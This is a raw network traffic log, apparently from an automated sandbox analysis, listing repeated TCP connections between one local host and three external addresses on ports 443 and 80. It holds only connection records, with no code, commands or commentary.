Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
